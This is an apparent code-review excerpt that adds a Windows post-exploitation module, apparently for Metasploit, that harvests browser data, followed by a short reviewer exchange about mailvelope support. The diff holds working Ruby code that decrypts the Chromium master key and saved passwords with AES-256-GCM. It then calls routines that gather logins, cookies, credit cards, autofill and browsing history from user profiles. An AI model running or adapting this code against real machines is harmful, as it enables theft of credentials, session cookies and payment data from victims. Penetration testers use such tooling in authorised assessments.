modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,896 @@
+            decrypted_key += "\x00"
+          else
+            return nil
+          end
+        end
+        print_good("Decrypted key (hex): #{decrypted_key.unpack('H*').first}") if datastore['VERBOSE']
+        return decrypted_key
+      else
+        print_error('os_crypt or encrypted_key not found in Local State.')
+        return nil
+      end
+    else
+      print_error("Local State file not found at: #{local_state_path}")
+      return nil
+    end
+  end
+
+  def decrypt_chromium_password(encrypted_password, key)
+    @app_bound_encryption_detected ||= false
+    @password_decryption_failed ||= false
+
+    # Check for the "v20" prefix that indicates App-Bound encryption, which can't be decrypted yet.
+    # https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
+    if encrypted_password[0, 3] == 'v20'
+      unless @app_bound_encryption_detected
+        print_status('Detected entries using App-Bound encryption (v20). These entries will not be decrypted.') if datastore['VERBOSE']
+        @app_bound_encryption_detected = true
+      end
+      return nil
+    end
+
+    if encrypted_password.nil? || encrypted_password.length < (IV_SIZE + TAG_SIZE + 3)
+      print_error('Invalid encrypted password length.') if datastore['VERBOSE']
+      return nil
+    end
+
+    iv = encrypted_password[3, IV_SIZE]
+    ciphertext = encrypted_password[IV_SIZE + 3...-TAG_SIZE]
+    tag = encrypted_password[-TAG_SIZE..]
+
+    if iv.nil? || iv.length != IV_SIZE
+      print_error("Invalid IV: expected #{IV_SIZE} bytes, got #{iv.nil? ? 'nil' : iv.length} bytes") if datastore['VERBOSE']
+      return nil
+    end
+
+    begin
+      aes = OpenSSL::Cipher.new('aes-256-gcm')
+      aes.decrypt
+      aes.key = key
+      aes.iv = iv
+      aes.auth_tag = tag
+      decrypted_password = aes.update(ciphertext) + aes.final
+      return decrypted_password
+    rescue OpenSSL::Cipher::CipherError
+      unless @password_decryption_failed
+        print_status('Password decryption failed for one or more entries. These entries could not be decrypted.') if datastore['VERBOSE']
+        @password_decryption_failed = true
+      end
+      return nil
+    end
+  end
+
+  def extract_chromium_data(profile_path, encryption_key, browser)
+    return print_error("Profile path #{profile_path} not found.") unless directory?(profile_path)
+
+    process_chromium_logins(profile_path, encryption_key, browser)
+    process_chromium_cookies(profile_path, encryption_key, browser)
+    process_chromium_credit_cards(profile_path, encryption_key, browser)
+    process_chromium_download_history(profile_path, browser)
+    process_chromium_autofill_data(profile_path, browser)
+    process_chromium_keyword_search_history(profile_path, browser)
+    process_chromium_browsing_history(profile_path, browser)
+    process_chromium_bookmarks(profile_path, browser)
+    process_chromium_extensions(profile_path, browser)
```

Comment:
Looks like the existing module has `mailvelope` support, is that worth aligning behaviors on?

Reply:
If there are requests for it, I can sure check it. But it very likely would require more research. Doubt it can simply be ported as the original implementation is quite old. But in all honest, haven't tested it either.